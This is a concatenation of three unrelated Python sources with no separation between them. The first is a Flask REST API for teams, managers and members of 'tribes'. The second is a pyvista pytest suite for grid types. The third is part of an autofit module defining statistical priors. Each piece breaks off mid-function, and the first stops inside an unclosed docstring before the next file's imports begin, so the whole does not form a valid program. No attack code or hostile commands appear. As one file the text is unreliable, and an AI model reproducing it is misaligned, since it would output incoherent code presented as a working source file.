from flask import abort, Response, jsonify, request
from flask_jwt_extended import current_user
from flask_restful import Resource
from sqlalchemy import exc
from datetime import date
from backend.app import db
from backend.common.permissions import roles_allowed
from backend.models import Team, Tribe, TeamUserLink, User, Answer
class TeamsRes(Resource):
"""Teams collection."""
@roles_allowed(['admin', 'editor'])
def post(self, tribe_id):
"""Create a new team.
Creates a new team with given name.
Roles allowed: admin, editor.
---
tags:
- teams
security:
- bearerAuth: []
consumes:
- application/json
parameters:
- in: path
name: tribe_id
required: true
description: Id of the tribe.
schema:
type: integer
- in: body
name: team
required: true
description: Team object.
schema:
$ref: '#/definitions/Team'
responses:
201:
description: Success.
headers:
Location:
description: URI of the created team.
type: string
403:
description: Forbidden. Requesting user doesn't have rights to\
this team.
400:
description: No tribe name given.
"""
Tribe.get_if_exists(tribe_id)
Tribe.validate_access(tribe_id, current_user)
json = request.get_json()
if 'name' not in json:
abort(400, 'No team data given')
team = Team(tribe_id, json['name'])
try:
db.session.add(team)
db.session.commit()
except exc.SQLAlchemyError:
abort(400)
response = jsonify(team.serialize())
response.headers['Location'] = '/tribes/%d/teams/%d' \
% (team.tribe_id, team.id)
response.status_code = 201
return response
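# Example request (hypothetical host and token; the URL shape is inferred from the
# Location header built above, not from the app's actual routing table):
#     curl -X POST https://api.example.com/tribes/1/teams \
#          -H "Authorization: Bearer <token>" \
#          -H "Content-Type: application/json" \
#          -d '{"name": "Backend Team"}'
# A successful call returns 201 with the serialized team and a Location header
# such as /tribes/1/teams/7.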
@roles_allowed(['admin', 'editor'])
def get(self, tribe_id):
"""Get all teams in a tribe.
Roles allowed: admin, editor.
---
tags:
- teams
security:
- bearerAuth: []
parameters:
- in: path
name: tribe_id
required: true
description: Id of the tribe.
schema:
type: integer
responses:
200:
description: Success. Return list of teams.
404:
description: Tribe with requested id doesn't exist.
"""
Tribe.get_if_exists(tribe_id)
teams = (
Team.query
.filter_by(tribe_id=tribe_id, deleted=False)
.order_by(Team.name.asc())
.all()
)
response = jsonify([t.serialize() for t in teams])
response.status_code = 200
return response
class TeamRes(Resource):
"""Single team identified by id."""
@roles_allowed(['admin', 'editor'])
def get(self, team_id):
"""Get full info of a team.
Roles allowed: admin, editor.
---
tags:
- teams
security:
- bearerAuth: []
parameters:
- in: path
name: team_id
required: true
description: Id of the team.
schema:
type: integer
responses:
200:
description: Success. Returns team info.
404:
description: Team with requested id doesn't exist.
"""
team = Team.get_if_exists(team_id)
response = jsonify(team.serialize())
response.status_code = 200
return response
@roles_allowed(['admin', 'editor'])
def put(self, team_id):
"""Update team.
Roles allowed: admin, editor.
---
tags:
- teams
security:
- bearerAuth: []
consumes:
- application/json
parameters:
- in: path
name: team_id
required: true
description: Id of the team.
schema:
type: integer
- in: body
name: team
required: true
description: Team object.
schema:
$ref: '#/definitions/Team'
responses:
200:
description: Success. Returns team info.
400:
description: No team data given.
403:
description: Forbidden. Requesting user doesn't have rights to\
this team.
404:
description: Team with requested id doesn't exist.
"""
team = Team.get_if_exists(team_id)
Tribe.validate_access(team.tribe_id, current_user)
json = request.get_json()
if 'name' not in json or 'tribe_id' not in json:
abort(400, 'No team data given.')
Tribe.get_if_exists(json['tribe_id'])
team.name = json['name']
team.tribe_id = json['tribe_id']
try:
db.session.add(team)
db.session.commit()
except exc.SQLAlchemyError:
abort(400)
response = jsonify(team.serialize())
response.status_code = 200
return response
@roles_allowed(['admin', 'editor'])
def patch(self, team_id):
"""Partially update team.
Roles allowed: admin, editor.
---
tags:
- teams
security:
- bearerAuth: []
consumes:
- application/json
parameters:
- in: path
name: team_id
required: true
description: Id of the team.
schema:
type: integer
- in: body
name: team
required: true
description: Team object. Not all properties are required.
schema:
$ref: '#/definitions/Team'
responses:
200:
description: Success. Returns team info.
403:
description: Forbidden. Requesting user doesn't have rights to\
this team.
404:
description: Team with requested id doesn't exist.
"""
json = request.get_json()
if 'restore' in json:
team = Team.get_from_deleted(team_id)
Tribe.validate_access(team.tribe_id, current_user)
team.deleted = False
else:
team = Team.get_if_exists(team_id)
Tribe.validate_access(team.tribe_id, current_user)
if 'name' in json:
team.name = json['name']
if 'tribe_id' in json:
Tribe.get_if_exists(json['tribe_id'])
team.tribe_id = json['tribe_id']
try:
db.session.add(team)
db.session.commit()
except exc.SQLAlchemyError:
abort(400)
response = jsonify(team.serialize())
response.status_code = 200
return response
@roles_allowed(['admin', 'editor'])
def delete(self, team_id):
"""Delete team.
Roles allowed: admin, editor.
---
tags:
- teams
security:
- bearerAuth: []
parameters:
- in: path
name: team_id
required: true
description: Id of the team.
schema:
type: integer
responses:
204:
description: Success.
403:
description: Forbidden. Requesting user doesn't have rights to\
this team.
404:
description: Team with requested id doesn't exist.
"""
team = Team.get_if_exists(team_id)
Tribe.validate_access(team.tribe_id, current_user)
team.users.clear()
team.deleted = True
team.deleted_at = date.today()
try:
db.session.add(team)
db.session.commit()
except exc.SQLAlchemyError:
abort(400)
response = Response()
response.status_code = 204
return response
class TeamManagersRes(Resource):
"""Collection of managers of the specific team."""
@roles_allowed(['admin', 'editor'])
def get(self, team_id):
"""Get managers of the team.
Roles allowed: admin, editor.
---
tags:
- teams
security:
- bearerAuth: []
parameters:
- in: path
name: team_id
required: true
description: Id of the team.
schema:
type: integer
responses:
200:
description: Success. Returns list of the managers.
403:
description: Forbidden. Requesting user doesn't have rights to\
this team.
404:
description: Team with requested id doesn't exist.
"""
team = Team.get_if_exists(team_id)
Tribe.validate_access(team.tribe_id, current_user)
manager_links = (
TeamUserLink.query
.filter_by(team_id=team_id, manager=True)
.join(TeamUserLink.user)
.order_by(User.full_name.asc())
.all()
)
response = jsonify([l.user.serialize() for l in manager_links])
response.status_code = 200
return response
class TeamManagerRes(Resource):
"""Single team manager resource."""
@roles_allowed(['admin', 'editor'])
def put(self, team_id, user_id):
"""Add manager to the team.
Roles allowed: admin, editor.
---
tags:
- teams
security:
- bearerAuth: []
parameters:
- in: path
name: team_id
required: true
description: Id of the team.
schema:
type: integer
- in: path
name: user_id
required: true
description: Id of the user.
schema:
type: integer
responses:
201:
description: Success.
204:
description: User is already a manager in this team.
403:
description: Forbidden. Requesting user doesn't have rights to\
this team.
404:
description: Team or user with requested id doesn't exist.
"""
team = Team.get_if_exists(team_id)
user = User.get_if_exists(user_id)
Tribe.validate_access(team.tribe_id, current_user)
if int(team_id) in user.managing_ids():
response = Response()
response.status_code = 204
return response
manager_link = TeamUserLink(team_id=team_id,
user_id=user_id,
manager=True)
team.users.append(manager_link)
try:
db.session.add(user)
db.session.add(team)
db.session.commit()
except exc.SQLAlchemyError:
abort(400)
response = Response()
response.status_code = 201
return response
@roles_allowed(['admin', 'editor'])
def delete(self, team_id, user_id):
"""Remove manager from the team.
Roles allowed: admin, editor.
---
tags:
- teams
security:
- bearerAuth: []
parameters:
- in: path
name: team_id
required: true
description: Id of the team.
schema:
type: integer
- in: path
name: user_id
required: true
description: Id of the user.
schema:
type: integer
responses:
204:
description: Success.
403:
description: Forbidden. Requesting user doesn't have rights to\
this team.
404:
description: Team or user with requested id doesn't exist.
"""
team = Team.get_if_exists(team_id)
user = User.get_if_exists(user_id)
Tribe.validate_access(team.tribe_id, current_user)
manager_link = (
TeamUserLink.query
.filter_by(user_id=user_id, team_id=team_id, manager=True)
.first()
)
if manager_link is None:
abort(404, 'Requested manager does not exist.')
try:
db.session.delete(manager_link)
db.session.commit()
except exc.SQLAlchemyError:
abort(400)
user.revalidate()
response = Response()
response.status_code = 204
return response
class TeamUsersRes(Resource):
"""Collection of team members."""
@roles_allowed(['admin', 'editor'])
def get(self, team_id):
"""Get members of the team.
Roles allowed: admin, editor.
---
tags:
- teams
security:
- bearerAuth: []
parameters:
- in: path
name: team_id
required: true
description: Id of the team.
schema:
type: integer
responses:
200:
description: Success. Returns list of the members.
403:
description: Forbidden. Requesting user doesn't have rights to\
this team.
404:
description: Team with requested id doesn't exist.
"""
team = Team.get_if_exists(team_id)
Tribe.validate_access(team.tribe_id, current_user)
user_links = (
TeamUserLink.query
.filter_by(team_id=team_id, manager=False)
.join(TeamUserLink.user)
.order_by(User.full_name)
.all()
)
response = jsonify([l.user.serialize() for l in user_links])
response.status_code = 200
return response
class TeamUserRes(Resource):
"""Single team member."""
@roles_allowed(['admin', 'editor'])
def put(self, team_id, user_id):
"""Add member to the team.
Roles allowed: admin, editor.
---
tags:
- teams
security:
- bearerAuth: []
parameters:
- in: path
name: team_id
required: true
description: Id of the team.
schema:
type: integer
- in: path
name: user_id
required: true
description: Id of the user.
schema:
type: integer
responses:
201:
description: Success.
204:
description: User is already a member in this team.
403:
description: Forbidden. Requesting user doesn't have rights to\
this team.
404:
description: Team or user with requested id doesn't exist.
"""
team = Team.get_if_exists(team_id)
user = User.get_if_exists(user_id)
Tribe.validate_access(team.tribe_id, current_user)
if int(team_id) in user.team_ids():
response = Response()
response.status_code = 204
return response
user_link = TeamUserLink(team_id=team_id,
user_id=user_id,
manager=False)
team.users.append(user_link)
try:
db.session.add(user)
db.session.add(team)
db.session.commit()
except exc.SQLAlchemyError:
abort(400)
response = Response()
response.status_code = 201
return response
@roles_allowed(['admin', 'editor'])
def delete(self, team_id, user_id):
"""Remove member from the team.
import os
import numpy as np
import pytest
import vtk
import pyvista
from pyvista import examples
from pyvista.plotting import system_supports_plotting
beam = pyvista.UnstructuredGrid(examples.hexbeamfile)
# create structured grid
x = np.arange(-10, 10, 2)
y = np.arange(-10, 10, 2)
z = np.arange(-10, 10, 2)
x, y, z = np.meshgrid(x, y, z)
sgrid = pyvista.StructuredGrid(x, y, z)
try:
test_path = os.path.dirname(os.path.abspath(__file__))
test_data_path = os.path.join(test_path, 'test_data')
except NameError:  # __file__ is undefined in some interactive sessions
test_path = '/home/alex/afrl/python/source/pyvista/tests'
def test_volume():
assert beam.volume > 0.0
@pytest.mark.skipif(not system_supports_plotting(), reason="Requires system to support plotting")
def test_struct_example():
# create and plot structured grid
grid = examples.load_structured()
cpos = grid.plot(off_screen=True) # basic plot
assert isinstance(cpos, pyvista.CameraPosition)
# Plot mean curvature
cpos_curv = grid.plot_curvature(off_screen=True)
assert isinstance(cpos_curv, pyvista.CameraPosition)
def test_init_from_structured():
unstruct_grid = pyvista.UnstructuredGrid(sgrid)
assert unstruct_grid.points.shape[0] == x.size
assert np.all(unstruct_grid.celltypes == 12)
def test_init_from_unstructured():
grid = pyvista.UnstructuredGrid(beam, deep=True)
grid.points += 1
assert not np.any(grid.points == beam.points)
def test_init_bad_input():
with pytest.raises(Exception):
unstruct_grid = pyvista.UnstructuredGrid(np.array(1))
with pytest.raises(Exception):
unstruct_grid = pyvista.UnstructuredGrid(np.array(1),
np.array(1),
np.array(1),
'woa')
def test_init_from_arrays():
offset = np.array([0, 9], np.int8)
cells = np.array([8, 0, 1, 2, 3, 4, 5, 6, 7, 8, 8, 9, 10, 11, 12, 13, 14, 15])
cell_type = np.array([vtk.VTK_HEXAHEDRON, vtk.VTK_HEXAHEDRON], np.int32)
cell1 = np.array([[0, 0, 0],
[1, 0, 0],
[1, 1, 0],
[0, 1, 0],
[0, 0, 1],
[1, 0, 1],
[1, 1, 1],
[0, 1, 1]])
cell2 = np.array([[0, 0, 2],
[1, 0, 2],
[1, 1, 2],
[0, 1, 2],
[0, 0, 3],
[1, 0, 3],
[1, 1, 3],
[0, 1, 3]])
points = np.vstack((cell1, cell2)).astype(np.int32)
grid = pyvista.UnstructuredGrid(offset, cells, cell_type, points)
assert grid.n_cells == 2
assert np.allclose(grid.offset, offset)
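# Note on the arrays used above (VTK legacy layout): `cells` is a flat sequence of
# [n_points, p0, ..., pN] records, `offset` holds the index in `cells` where each
# record starts (0 and 9 for two 8-node hexahedra), and `cell_type` holds one VTK
# type id per cell. A small illustrative sanity check of that layout:
def test_cells_offset_layout():
    offset = np.array([0, 9], np.int8)
    cells = np.array([8, 0, 1, 2, 3, 4, 5, 6, 7, 8, 8, 9, 10, 11, 12, 13, 14, 15])
    # every record begins with its point count, so each offset must land on an 8
    assert all(cells[o] == 8 for o in offset)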
def test_surface_indices():
surf = beam.extract_surface()
surf_ind = surf.point_arrays['vtkOriginalPointIds']
assert np.allclose(surf_ind, beam.surface_indices())
def test_extract_feature_edges():
edges = beam.extract_feature_edges(90)
assert edges.n_points
edges = beam.extract_feature_edges(180)
assert not edges.n_points
@pytest.mark.parametrize('binary', [True, False])
@pytest.mark.parametrize('extension', ['vtu', 'vtk'])
def test_save(extension, binary, tmpdir):
filename = str(tmpdir.mkdir("tmpdir").join('tmp.%s' % extension))
beam.save(filename, binary)
grid = pyvista.UnstructuredGrid(filename)
assert grid.cells.shape == beam.cells.shape
assert grid.points.shape == beam.points.shape
grid = pyvista.read(filename)
assert grid.cells.shape == beam.cells.shape
assert grid.points.shape == beam.points.shape
assert isinstance(grid, pyvista.UnstructuredGrid)
def test_init_bad_filename():
filename = os.path.join(test_path, 'test_grid.py')
with pytest.raises(Exception):
grid = pyvista.UnstructuredGrid(filename)
with pytest.raises(Exception):
grid = pyvista.UnstructuredGrid('not a file')
def test_save_bad_extension():
with pytest.raises(Exception):
grid = pyvista.UnstructuredGrid('file.abc')
def test_linear_copy():
# need a grid with quadratic cells
lgrid = beam.linear_copy()
assert np.all(lgrid.celltypes < 20)
def test_extract_cells():
ind = [1, 2, 3]
part_beam = beam.extract_cells(ind)
assert part_beam.n_cells == len(ind)
assert part_beam.n_points < beam.n_points
mask = np.zeros(beam.n_cells, np.bool)
mask[:3] = True
part_beam = beam.extract_cells(mask)
assert part_beam.n_cells == len(ind)
assert part_beam.n_points < beam.n_points
def test_merge():
grid = beam.copy()
grid.points[:, 0] += 1
unmerged = grid.merge(beam, inplace=False, merge_points=False)
grid.merge(beam, inplace=True, merge_points=True)
assert grid.n_points > beam.n_points
assert grid.n_points < unmerged.n_points
def test_merge_not_main():
grid = beam.copy()
grid.points[:, 0] += 1
unmerged = grid.merge(beam, inplace=False, merge_points=False,
main_has_priority=False)
grid.merge(beam, inplace=True, merge_points=True)
assert grid.n_points > beam.n_points
assert grid.n_points < unmerged.n_points
def test_merge_list():
grid_a = beam.copy()
grid_a.points[:, 0] += 1
grid_b = beam.copy()
grid_b.points[:, 1] += 1
grid_a.merge([beam, grid_b], inplace=True, merge_points=True)
assert grid_a.n_points > beam.n_points
def test_init_structured():
xrng = np.arange(-10, 10, 2)
yrng = np.arange(-10, 10, 2)
zrng = np.arange(-10, 10, 2)
x, y, z = np.meshgrid(xrng, yrng, zrng)
grid = pyvista.StructuredGrid(x, y, z)
assert np.allclose(grid.x, x)
assert np.allclose(grid.y, y)
assert np.allclose(grid.z, z)
grid_a = pyvista.StructuredGrid(grid)
assert np.allclose(grid_a.points, grid.points)
def test_invalid_init_structured():
xrng = np.arange(-10, 10, 2)
yrng = np.arange(-10, 10, 2)
zrng = np.arange(-10, 10, 2)
x, y, z = np.meshgrid(xrng, yrng, zrng)
z = z[:, :, :2]
with pytest.raises(Exception):
grid = pyvista.StructuredGrid(x, y, z)
@pytest.mark.parametrize('binary', [True, False])
@pytest.mark.parametrize('extension', ['vts', 'vtk'])
def test_save_structured(extension, binary, tmpdir):
filename = str(tmpdir.mkdir("tmpdir").join('tmp.%s' % extension))
sgrid.save(filename, binary)
grid = pyvista.StructuredGrid(filename)
assert grid.x.shape == sgrid.x.shape
assert grid.n_cells
assert grid.points.shape == sgrid.points.shape
grid = pyvista.read(filename)
assert grid.x.shape == sgrid.x.shape
assert grid.n_cells
assert grid.points.shape == sgrid.points.shape
assert isinstance(grid, pyvista.StructuredGrid)
def test_load_structured_bad_filename():
with pytest.raises(Exception):
pyvista.StructuredGrid('not a file')
filename = os.path.join(test_path, 'test_grid.py')
with pytest.raises(Exception):
grid = pyvista.StructuredGrid(filename)
def test_create_rectilinear_grid_from_specs():
# 3D example
xrng = np.arange(-10, 10, 2)
yrng = np.arange(-10, 10, 5)
zrng = np.arange(-10, 10, 1)
grid = pyvista.RectilinearGrid(xrng)
assert grid.n_cells == 9
assert grid.n_points == 10
grid = pyvista.RectilinearGrid(xrng, yrng)
assert grid.n_cells == 9*3
assert grid.n_points == 10*4
grid = pyvista.RectilinearGrid(xrng, yrng, zrng)
assert grid.n_cells == 9*3*19
assert grid.n_points == 10*4*20
assert grid.bounds == [-10.0,8.0, -10.0,5.0, -10.0,9.0]
# 2D example
cell_spacings = np.array([1., 1., 2., 2., 5., 10.])
x_coordinates = np.cumsum(cell_spacings)
y_coordinates = np.cumsum(cell_spacings)
grid = pyvista.RectilinearGrid(x_coordinates, y_coordinates)
assert grid.n_cells == 5*5
assert grid.n_points == 6*6
assert grid.bounds == [1.,21., 1.,21., 0.,0.]
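# The counts asserted above follow directly from the coordinate arrays:
# np.arange(-10, 10, 2) has 10 entries, np.arange(-10, 10, 5) has 4 and
# np.arange(-10, 10, 1) has 20, so n_points = 10*4*20 and
# n_cells = (10-1)*(4-1)*(20-1) = 9*3*19; the 2D case works the same way with
# the z direction collapsed to a single layer.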
def test_create_rectilinear_after_init():
x = np.array([0,1,2])
y = np.array([0,5,8])
z = np.array([3,2,1])
grid = pyvista.RectilinearGrid()
grid.x = x
assert grid.dimensions == [3, 1, 1]
grid.y = y
assert grid.dimensions == [3, 3, 1]
grid.z = z
assert grid.dimensions == [3, 3, 3]
assert np.allclose(grid.x, x)
assert np.allclose(grid.y, y)
assert np.allclose(grid.z, z)
def test_create_rectilinear_grid_from_file():
grid = examples.load_rectilinear()
assert grid.n_cells == 16146
assert grid.n_points == 18144
assert grid.bounds == [-350.0,1350.0, -400.0,1350.0, -850.0,0.0]
assert grid.n_arrays == 1
def test_read_rectilinear_grid_from_file():
grid = pyvista.read(examples.rectfile)
assert grid.n_cells == 16146
assert grid.n_points == 18144
assert grid.bounds == [-350.0,1350.0, -400.0,1350.0, -850.0,0.0]
assert grid.n_arrays == 1
def test_cast_rectilinear_grid():
grid = pyvista.read(examples.rectfile)
structured = grid.cast_to_structured_grid()
assert isinstance(structured, pyvista.StructuredGrid)
assert structured.n_points == grid.n_points
assert structured.n_cells == grid.n_cells
assert np.allclose(structured.points, grid.points)
for k, v in grid.point_arrays.items():
assert np.allclose(structured.point_arrays[k], v)
for k, v in grid.cell_arrays.items():
assert np.allclose(structured.cell_arrays[k], v)
def test_create_uniform_grid_from_specs():
# create UniformGrid
dims = [10, 10, 10]
grid = pyvista.UniformGrid(dims) # Using default spacing and origin
assert grid.dimensions == [10, 10, 10]
assert grid.extent == [0, 9, 0, 9, 0, 9]
assert grid.origin == [0.0, 0.0, 0.0]
assert grid.spacing == [1.0, 1.0, 1.0]
spacing = [2, 1, 5]
grid = pyvista.UniformGrid(dims, spacing) # Using default origin
assert grid.dimensions == [10, 10, 10]
assert grid.origin == [0.0, 0.0, 0.0]
assert grid.spacing == [2.0, 1.0, 5.0]
origin = [10, 35, 50]
grid = pyvista.UniformGrid(dims, spacing, origin) # Everything is specified
assert grid.dimensions == [10, 10, 10]
assert grid.origin == [10.0, 35.0, 50.0]
assert grid.spacing == [2.0, 1.0, 5.0]
assert grid.dimensions == [10, 10, 10]
def test_uniform_setters():
grid = pyvista.UniformGrid()
grid.dimensions = [10, 10, 10]
assert grid.GetDimensions() == (10, 10, 10)
assert grid.dimensions == [10, 10, 10]
grid.spacing = [5, 2, 1]
assert grid.GetSpacing() == (5, 2, 1)
assert grid.spacing == [5, 2, 1]
grid.origin = [6, 27.7, 19.8]
assert grid.GetOrigin() == (6, 27.7, 19.8)
assert grid.origin == [6, 27.7, 19.8]
def test_create_uniform_grid_from_file():
grid = examples.load_uniform()
assert grid.n_cells == 729
assert grid.n_points == 1000
assert grid.bounds == [0.0,9.0, 0.0,9.0, 0.0,9.0]
assert grid.n_arrays == 2
assert grid.dimensions == [10, 10, 10]
def test_read_uniform_grid_from_file():
grid = pyvista.read(examples.uniformfile)
assert grid.n_cells == 729
assert grid.n_points == 1000
assert grid.bounds == [0.0,9.0, 0.0,9.0, 0.0,9.0]
assert grid.n_arrays == 2
assert grid.dimensions == [10, 10, 10]
def test_cast_uniform_to_structured():
grid = examples.load_uniform()
structured = grid.cast_to_structured_grid()
assert structured.n_points == grid.n_points
assert structured.n_arrays == grid.n_arrays
assert structured.bounds == grid.bounds
def test_cast_uniform_to_rectilinear():
grid = examples.load_uniform()
rectilinear = grid.cast_to_rectilinear_grid()
assert rectilinear.n_points == grid.n_points
assert rectilinear.n_arrays == grid.n_arrays
assert rectilinear.bounds == grid.bounds
@pytest.mark.parametrize('binary', [True, False])
@pytest.mark.parametrize('extension', ['vtr', 'vtk'])
def test_save_rectilinear(extension, binary, tmpdir):
filename = str(tmpdir.mkdir("tmpdir").join('tmp.%s' % extension))
ogrid = examples.load_rectilinear()
ogrid.save(filename, binary)
grid = pyvista.RectilinearGrid(filename)
assert grid.n_cells == ogrid.n_cells
assert np.allclose(grid.x, ogrid.x)
assert np.allclose(grid.y, ogrid.y)
assert np.allclose(grid.z, ogrid.z)
assert grid.dimensions == ogrid.dimensions
grid = pyvista.read(filename)
assert isinstance(grid, pyvista.RectilinearGrid)
assert grid.n_cells == ogrid.n_cells
assert np.allclose(grid.x, ogrid.x)
assert np.allclose(grid.y, ogrid.y)
assert np.allclose(grid.z, ogrid.z)
assert grid.dimensions == ogrid.dimensions
@pytest.mark.parametrize('binary', [True, False])
@pytest.mark.parametrize('extension', ['vti', 'vtk'])
def test_save_uniform(extension, binary, tmpdir):
filename = str(tmpdir.mkdir("tmpdir").join('tmp.%s' % extension))
ogrid = examples.load_uniform()
ogrid.save(filename, binary)
grid = pyvista.UniformGrid(filename)
assert grid.n_cells == ogrid.n_cells
assert grid.origin == ogrid.origin
assert grid.spacing == ogrid.spacing
assert grid.dimensions == ogrid.dimensions
grid = pyvista.read(filename)
assert isinstance(grid, pyvista.UniformGrid)
assert grid.n_cells == ogrid.n_cells
assert grid.origin == ogrid.origin
assert grid.spacing == ogrid.spacing
assert grid.dimensions == ogrid.dimensions
def test_grid_points():
"""Test the points methods on UniformGrid and RectilinearGrid"""
points = np.array([[0, 0, 0],
[1, 0, 0],
[1, 1, 0],
[0, 1, 0],
[0, 0, 1],
[1, 0, 1],
[1, 1, 1],
[0, 1, 1]])
grid = pyvista.UniformGrid()
grid.points = points
assert grid.dimensions == [2, 2, 2]
assert grid.spacing == [1, 1, 1]
assert grid.origin == [0., 0., 0.]
assert np.allclose(np.unique(grid.points, axis=0), np.unique(points, axis=0))
opts = np.c_[grid.x, grid.y, grid.z]
assert np.allclose(np.unique(opts, axis=0), np.unique(points, axis=0))
# Now test rectilinear grid
del grid
grid = pyvista.RectilinearGrid()
grid.points = points
assert grid.dimensions == [2, 2, 2]
assert np.allclose(np.unique(grid.points, axis=0), np.unique(points, axis=0))
def test_grid_extract_selection_points():
grid =
import inspect
import math
import sys
from abc import ABC, abstractmethod
from typing import Union, Tuple
import numpy as np
from scipy import stats
from scipy.special import erfcinv
from autoconf import conf
from autofit import exc
from autofit.mapper.model_object import ModelObject
from autofit.mapper.prior.arithmetic import ArithmeticMixin
from autofit.mapper.prior.deferred import DeferredArgument
from autofit.mapper.prior_model.attribute_pair import (
cast_collection,
PriorNameValue,
InstanceNameValue,
)
from autofit.mapper.variable import Variable
class WidthModifier:
def __init__(self, value):
self.value = float(value)
@classmethod
def name_of_class(cls) -> str:
"""
A string name for the class, with the prior suffix removed.
"""
return cls.__name__.replace("WidthModifier", "")
@classmethod
def from_dict(cls, width_modifier_dict):
return width_modifier_type_dict[width_modifier_dict["type"]](
value=width_modifier_dict["value"]
)
@property
def dict(self):
return {"type": self.name_of_class(), "value": self.value}
@staticmethod
def for_class_and_attribute_name(cls, attribute_name):
prior_dict = conf.instance.prior_config.for_class_and_suffix_path(
cls, [attribute_name, "width_modifier"]
)
return WidthModifier.from_dict(prior_dict)
def __eq__(self, other):
return self.__class__ is other.__class__ and self.value == other.value
class Limits:
@staticmethod
def for_class_and_attributes_name(cls, attribute_name):
limit_dict = conf.instance.prior_config.for_class_and_suffix_path(
cls, [attribute_name, "gaussian_limits"]
)
return limit_dict["lower"], limit_dict["upper"]
class RelativeWidthModifier(WidthModifier):
def __call__(self, mean):
return self.value * mean
class AbsoluteWidthModifier(WidthModifier):
def __call__(self, _):
return self.value
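# A small usage sketch (assuming width_modifier_type_dict, defined elsewhere in this
# module, maps the "Relative"/"Absolute" names produced by name_of_class() to these
# classes):
#     modifier = WidthModifier.from_dict({"type": "Relative", "value": 0.5})
#     modifier(10.0)  # -> 5.0, i.e. half of the supplied mean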
class TuplePrior(ModelObject):
"""
A prior comprising one or more priors in a tuple
"""
@property
@cast_collection(PriorNameValue)
def prior_tuples(self):
"""
Returns
-------
priors: [(String, Prior)]
A list of priors contained in this tuple
"""
return list(filter(lambda t: isinstance(t[1], Prior), self.__dict__.items()))
@property
def unique_prior_tuples(self):
return self.prior_tuples
@property
@cast_collection(InstanceNameValue)
def instance_tuples(self):
"""
Returns
-------
instances: [(String, instance)]
A list of instances
"""
return list(
sorted(
filter(lambda t: isinstance(t[1], float), self.__dict__.items()),
key=lambda tup: tup[0],
)
)
def value_for_arguments(self, arguments):
"""
Parameters
----------
arguments: {Prior: float}
A dictionary of arguments
Returns
-------
tuple: (float,...)
A tuple of float values
"""
def convert(tup):
if hasattr(tup, "prior"):
return arguments[tup.prior]
return tup.instance
return tuple(
map(
convert,
sorted(
self.prior_tuples + self.instance_tuples, key=lambda tup: tup.name
),
)
)
def gaussian_tuple_prior_for_arguments(self, arguments):
"""
Parameters
----------
arguments: {Prior: float}
A dictionary of arguments
Returns
-------
tuple_prior: TuplePrior
A new tuple prior with gaussian priors
"""
tuple_prior = TuplePrior()
for prior_tuple in self.prior_tuples:
setattr(tuple_prior, prior_tuple.name, arguments[prior_tuple.prior])
return tuple_prior
def __getitem__(self, item):
return self.prior_tuples[item][1]
class Prior(Variable, ABC, ArithmeticMixin):
def __init__(self, lower_limit=0.0, upper_limit=1.0):
"""
An object used to map a unit value to an attribute value for a specific
class attribute.
Parameters
----------
lower_limit: Float
The lowest value this prior can return
upper_limit: Float
The highest value this prior can return
"""
super().__init__()
self.lower_limit = float(lower_limit)
self.upper_limit = float(upper_limit)
if self.lower_limit >= self.upper_limit:
raise exc.PriorException(
"The upper limit of a prior must be greater than its lower limit"
)
def assert_within_limits(self, value):
if not (self.lower_limit <= value <= self.upper_limit):
raise exc.PriorLimitException(
"The physical value {} for a prior "
"was not within its limits {}, {}".format(
value, self.lower_limit, self.upper_limit
)
)
@staticmethod
def for_class_and_attribute_name(cls, attribute_name):
prior_dict = conf.instance.prior_config.for_class_and_suffix_path(
cls, [attribute_name]
)
return Prior.from_dict(prior_dict)
@property
def width(self):
return self.upper_limit - self.lower_limit
@abstractmethod
def value_for(self, unit: float) -> float:
"""
Return a physical value for a value between 0 and 1 with the transformation
described by this prior.
Parameters
----------
unit
A hypercube value between 0 and 1.
Returns
-------
A physical value.
"""
def instance_for_arguments(self, arguments):
return arguments[self]
def __eq__(self, other):
try:
return self.id == other.id
except AttributeError:
return False
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash(self.id)
def __repr__(self):
return "<{} id={} lower_limit={} upper_limit={}>".format(
self.__class__.__name__, self.id, self.lower_limit, self.upper_limit
)
@classmethod
def from_dict(cls, prior_dict: dict) -> Union["Prior", DeferredArgument]:
"""
Returns a prior from a JSON representation.
Parameters
----------
prior_dict : dict
A dictionary representation of a prior including a type (e.g. Uniform) and all constructor arguments.
Returns
-------
An instance of a child of this class.
"""
if prior_dict["type"] == "Constant":
return prior_dict["value"]
if prior_dict["type"] == "Deferred":
return DeferredArgument()
# noinspection PyProtectedMember
return prior_type_dict[prior_dict["type"]](
**{
key: value
for key, value in prior_dict.items()
if key not in ("type", "width_modifier", "gaussian_limits")
}
)
@property
def dict(self) -> dict:
"""
A dictionary representation of this prior
"""
prior_dict = {
"lower_limit": self.lower_limit,
"upper_limit": self.upper_limit,
"type": self.name_of_class(),
}
return prior_dict
@classmethod
def name_of_class(cls) -> str:
"""
A string name for the class, with the prior suffix removed.
"""
return cls.__name__.replace("Prior", "")
@property
def limits(self) -> Tuple[float, float]:
return self.lower_limit, self.upper_limit
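# A round-trip sketch for the dict representation (assuming prior_type_dict, defined
# elsewhere in this module, maps the names produced by name_of_class() to the
# concrete classes):
#     d = {"type": "Gaussian", "mean": 0.0, "sigma": 1.0,
#          "lower_limit": -math.inf, "upper_limit": math.inf}
#     prior = Prior.from_dict(d)   # -> a GaussianPrior(mean=0.0, sigma=1.0, ...)
#     prior.dict                   # -> the same keys and values again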
class GaussianPrior(Prior):
"""A prior with a gaussian distribution"""
__name__ = "gaussian_prior"
def __init__(self, mean, sigma, lower_limit=-math.inf, upper_limit=math.inf):
super().__init__(lower_limit, upper_limit)
self.mean = float(mean)
self.sigma = float(sigma)
self._log_pdf = None
@property
def logpdf(self):
if self._log_pdf is None:
norm = stats.norm(
loc=self.mean,
scale=self.sigma
)
self._log_pdf = norm.logpdf
return self._log_pdf
def __call__(self, x):
return self.logpdf(x)
def value_for(self, unit):
"""
Parameters
----------
unit: Float
A unit hypercube value between 0 and 1
Returns
-------
value: Float
A value for the attribute biased to the gaussian distribution
"""
return self.mean + (self.sigma * math.sqrt(2) * erfcinv(2.0 * (1.0 - unit)))
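# Sanity check of the inverse-CDF mapping above: erfcinv(1.0) == 0, so
# value_for(0.5) returns exactly the mean, and value_for(0.8413) is roughly
# mean + sigma (one standard deviation into the upper tail).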
def log_prior_from_value(self, value):
"""
Returns the log prior of a physical value, so the log likelihood of a model evaluation can be converted to a
posterior as log_prior + log_likelihood.
This is used by Emcee in the log likelihood function evaluation.
Parameters
----------
value : float
The physical value of this prior's corresponding parameter in a `NonLinearSearch` sample."""
return (value - self.mean) ** 2.0 / (2 * self.sigma ** 2.0)
def __str__(self):
